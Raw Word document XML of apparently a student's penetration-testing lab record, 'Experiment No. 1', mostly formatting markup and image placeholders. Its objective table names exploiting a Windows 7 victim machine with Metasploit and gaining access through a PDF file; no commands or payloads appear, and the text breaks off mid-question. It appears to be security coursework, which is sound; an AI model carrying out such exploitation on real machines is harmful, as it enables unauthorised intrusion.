          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665DC37E" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2212E5F3" w14:textId="77777777" w:rsidR="004307F9" w:rsidRDefault="004307F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36219529" w14:textId="60A12B9C" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="0084106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41641E4F" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="0084106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0419A9EB" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83837">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C794E02" wp14:editId="74B25C91">
            <wp:extent cx="4209803" cy="3137113"/>
            <wp:effectExtent l="0" t="0" r="635"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50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4213426" cy="3139813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C17CB" w14:textId="6DC881C9" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA2127">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4027DCAD" wp14:editId="5449BEF9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4421823" cy="3716977"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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421823" cy="3716977"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67985371" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5CAABC" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3AC2BB" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D26C24" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2072C9" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2712AB" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9D0017" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2323A9B2" w14:textId="7AFE1E07" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F3D33E" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DD67A0" w14:textId="77777777" w:rsidR="00057327" w:rsidRDefault="00057327" w:rsidP="00057327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13183E62" w14:textId="67DA38D4" w:rsidR="00BE1412" w:rsidRPr="001C411D" w:rsidRDefault="00057327" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA2127">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06370BCD" wp14:editId="5B9843B3">
            <wp:extent cx="4381995" cy="3659623"/>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52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4391595" cy="3667641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70928311" w14:textId="77777777" w:rsidR="00BE1412" w:rsidRPr="001C411D" w:rsidRDefault="00BE1412" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9CB594" w14:textId="77777777" w:rsidR="004307F9" w:rsidRDefault="004307F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F485E" w14:textId="2C555747" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXPERIMENT NO. 1</w:t>
      </w:r>
      <w:r w:rsidR="00E40D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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436DE" w:rsidRPr="001C411D" w14:paraId="3CDB074F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D99EA68"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r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Piyush Gambhir – 21CSU349</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57AA5711" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="3A95B1B6" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C27F42"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emester /Section: </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Semester-IV – AIML-B (AL-3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529F0BD4" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="27EC6E9D" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5498DAE5"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7F20C9D8" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="5239B574" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51840ED4" w14:textId="690BB09B" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Date: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="3F1BCD71" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="008327AB"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757C5D7F" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="0044C8BF" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42957A2D" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">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2EBF69A6" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69D5E6C8" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">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41062" w:rsidRPr="001C411D" w14:paraId="4A139B9B" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E03649E"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7337E114"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p w14:paraId="41C2BABF" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">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Third and Fourth phase of penetration testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6682FC3D" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="0CAA2206" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6D457547"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1CB11B2F" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="516C8D40" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062"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The students will be able to gain and maintain access of the target machine using pdf file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C73AC69"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250E032C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E7E68A"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5C843C55" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="580B80FD"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Cs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Exploit Windows to gain access of victim’s machine using Metasploit framework</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C604A44" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="4B25C103" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="259C7B1D"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7F2BCFFD" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DAE19EE" w14:textId="401DE5AB" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Exploit Windows 7 using Metasploit framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="3713D9E8" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="026A6C2E" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">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47C4DD41" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="467EA7FB" w14:textId="3053CEBC" w:rsidR="00FD3BA4" w:rsidRPr="00FD3BA4" w:rsidRDefault="00FD3BA4" w:rsidP="00FD3BA4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD3BA4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>What is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
